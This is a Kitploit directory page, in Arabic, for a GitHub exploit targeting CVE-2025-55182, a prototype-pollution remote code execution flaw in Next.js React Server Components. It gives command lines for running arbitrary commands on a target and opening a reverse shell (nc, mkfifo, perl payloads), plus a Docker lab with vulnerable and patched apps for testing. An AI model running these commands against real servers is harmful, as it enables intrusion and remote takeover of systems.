Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — استغلال لـ CVE-2025-55182 يتيح تنفيذ التعليمات البرمجية عن بُعد عبر تلوث النموذج الأولي في React Server Components في Next.js، مع إمكانية تنفيذ الأوامر وإنشاء قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/mr-destroyer/cve-2025-55182
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولاتمختبرات وتدريب عملي
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

استغلال لـ CVE-2025-55182 يتيح تنفيذ التعليمات البرمجية عن بُعد عبر تلوث النموذج الأولي في React Server Components في Next.js، مع إمكانية تنفيذ الأوامر وإنشاء قشرة عكسية.

عرض المستودع
منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة RCE في Next.js React Server Components

يستغل الثغرة CVE-2025-55182 لتنفيذ التعليمات البرمجية عن بُعد عبر تلوّث النموذج الأولي.

التثبيت

root@kitploit:~
uv sync

الاستخدام

تنفيذ الأوامر

root@kitploit:~
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

القشرة العكسية

root@kitploit:~
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

الخيارات

  • -u, --url: URL/المضيف المراد فحصه (مطلوب)
  • -c, --cmd: الأمر المراد تنفيذه
  • -r, --reverse: تفعيل وضع القشرة العكسية
  • -l, --lhost: مضيف المستمع للقشرة العكسية
  • -p, --lport: منفذ المستمع للقشرة العكسية
  • -P, --payload: نوع حمولة القشرة العكسية: nc، nc-mkfifo، sh، perl (الافتراضي: nc)
  • --timeout: مهلة الطلب بالثواني (الافتراضي: 10)
  • أمثلة

    root@kitploit:~
    # Execute command
    python3 exploit.py -u https://example.com -c "whoami"
    
    # Reverse shell with nc-mkfifo (recommended for Alpine)
    python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
    

    بيئة المختبر

    يحتوي دليل lab/ على إعداد Docker كامل لاختبار الاستغلال.

    الإعداد

    root@kitploit:~
    cd lab
    docker-compose up -d
    

    سيؤدي هذا إلى تشغيل خدمتين:

    • vulnerable: تطبيق Next.js القابل للاستغلال على المنفذ 3011
    • patched: تطبيق Next.js المُصحَّح على المنفذ 3012

    الاختبار

    root@kitploit:~
    # Test on vulnerable instance
    python3 exploit.py -u http://localhost:3011 -c "id"
    
    # Test reverse shell (get gateway IP first)
    GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
    python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
    
    تنزيل الأداة